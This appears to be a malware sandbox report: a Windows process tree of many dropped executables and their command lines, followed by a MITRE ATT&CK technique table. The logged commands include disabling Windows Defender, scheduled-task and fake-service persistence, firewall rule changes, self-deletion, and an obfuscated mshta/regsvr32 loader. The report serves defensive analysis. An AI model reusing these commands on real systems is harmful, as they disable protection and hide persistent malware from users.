                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5032
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5784
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5788
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4292
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4232
                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6044
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5924
                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:2644
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BD22.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BD22.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BD22.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\BD22.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:3008
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C541.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C541.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2192
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CC85.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\CC85.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4136
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D706.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D706.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6012
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E119.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E119.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:4396
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BA5.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BA5.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5760
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1615.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1615.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5400
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 1615.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1615.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:5308
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                  taskkill /im 1615.exe /f
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                  PID:1228
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\49C9.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\49C9.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:2700
                                                                                                                                                                                                                                                                                • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:5980
                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                    PID:3952
                                                                                                                                                                                                                                                                                  • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:3720
                                                                                                                                                                                                                                                                                      • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1280
                                                                                                                                                                                                                                                                                        • C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:5072
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4804
                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:5936
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:4376
                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:4768
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5256
                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3168
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:5212
                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:5672
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:5184
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D4A5.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D4A5.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:5076
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D4A5.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D4A5.exe
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:2332
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                  PID:5876
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D4A5.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\D4A5.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4852
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D4A5.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\D4A5.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:5244
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build2.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build2.exe"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:2176
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build2.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build2.exe"
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                PID:1676
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:2416
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                    PID:5260
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                    PID:5408
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build3.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build3.exe"
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:5076
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build3.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\edb01830-74a4-41e5-9a39-14a2475ea4ae\build3.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                    PID:5596
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                      PID:3804
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E55F.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E55F.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:5548
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wktvbvcl\
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vemkdfii.exe" C:\Windows\SysWOW64\wktvbvcl\
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:4908
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create wktvbvcl binPath= "C:\Windows\SysWOW64\wktvbvcl\vemkdfii.exe /d\"C:\Users\Admin\AppData\Local\Temp\E55F.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:4624
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description wktvbvcl "wifi internet conection"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:5292
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start wktvbvcl
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:5004
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\nngtfcbd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\nngtfcbd.exe" /d"C:\Users\Admin\AppData\Local\Temp\E55F.exe"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:4992
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qqjwifeg.exe" C:\Windows\SysWOW64\wktvbvcl\
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" config wktvbvcl binPath= "C:\Windows\SysWOW64\wktvbvcl\qqjwifeg.exe /d\"C:\Users\Admin\nngtfcbd.exe\""
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:5640
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start wktvbvcl
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4908
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:6028
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2331.bat" "
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5164
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5764
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F473.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F473.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5792
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbscrIpt: CLose(CReAtEoBJect ( "wscriPT.shell"). rUN ( "C:\Windows\system32\cmd.exe /c CopY /y ""C:\Users\Admin\AppData\Local\Temp\F473.exe"" ..\yWUAUK.eXE && stArT ..\ywUAUK.eXE -PVb9gGBiRPixyURGJ2&iF """" == """" for %e IN ( ""C:\Users\Admin\AppData\Local\Temp\F473.exe"" ) do taskkill /F /Im ""%~Nxe"" ", 0 , TrUe))
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4936
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c CopY /y "C:\Users\Admin\AppData\Local\Temp\F473.exe" ..\yWUAUK.eXE && stArT ..\ywUAUK.eXE -PVb9gGBiRPixyURGJ2&iF "" == "" for %e IN ( "C:\Users\Admin\AppData\Local\Temp\F473.exe" ) do taskkill /F /Im "%~Nxe"
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1676
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\yWUAUK.eXE
                                                                                                                                                                                                                                                                                                                                                                ..\ywUAUK.eXE -PVb9gGBiRPixyURGJ2
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3604
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbscrIpt: CLose(CReAtEoBJect ( "wscriPT.shell"). rUN ( "C:\Windows\system32\cmd.exe /c CopY /y ""C:\Users\Admin\AppData\Local\Temp\yWUAUK.eXE"" ..\yWUAUK.eXE && stArT ..\ywUAUK.eXE -PVb9gGBiRPixyURGJ2&iF ""-PVb9gGBiRPixyURGJ2"" == """" for %e IN ( ""C:\Users\Admin\AppData\Local\Temp\yWUAUK.eXE"" ) do taskkill /F /Im ""%~Nxe"" ", 0 , TrUe))
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5768
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c CopY /y "C:\Users\Admin\AppData\Local\Temp\yWUAUK.eXE" ..\yWUAUK.eXE && stArT ..\ywUAUK.eXE -PVb9gGBiRPixyURGJ2&iF "-PVb9gGBiRPixyURGJ2" == "" for %e IN ( "C:\Users\Admin\AppData\Local\Temp\yWUAUK.eXE" ) do taskkill /F /Im "%~Nxe"
                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4184
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbscriPt:ClOsE ( CReATEOBjecT ("WsCrIPt.ShelL"). RuN ( "cmD.Exe /C eChO C:\Users\Admin\AppData\Local\TempvoEYY> vQHOL.q & echO | SEt /P = ""MZ"" > IHMJY5q.Z& cOpY /B /y IHMJY5Q.Z + bYYqRC8.B + ZZpY.XUG + vQhOl.q ..\3KphJ8Gx.A & Start regsvr32.exe -U ..\3KpHJ8Gx.A /s & DEL /q * " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5852
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C eChO C:\Users\Admin\AppData\Local\TempvoEYY> vQHOL.q & echO | SEt /P = "MZ" >IHMJY5q.Z& cOpY /B /y IHMJY5Q.Z + bYYqRC8.B + ZZpY.XUG + vQhOl.q ..\3KphJ8Gx.A & Start regsvr32.exe -U ..\3KpHJ8Gx.A /s& DEL /q *
                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:496
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echO "
                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2780
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>IHMJY5q.Z"
                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5876
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                                    regsvr32.exe -U ..\3KpHJ8Gx.A /s
                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2784
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                taskkill /F /Im "F473.exe"
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                PID:5680
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FCE1.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\FCE1.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5324
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im FCE1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FCE1.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5716
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                  taskkill /im FCE1.exe /f
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                  PID:5084
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                  PID:6020

                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                                            File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1222

                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                            T1102

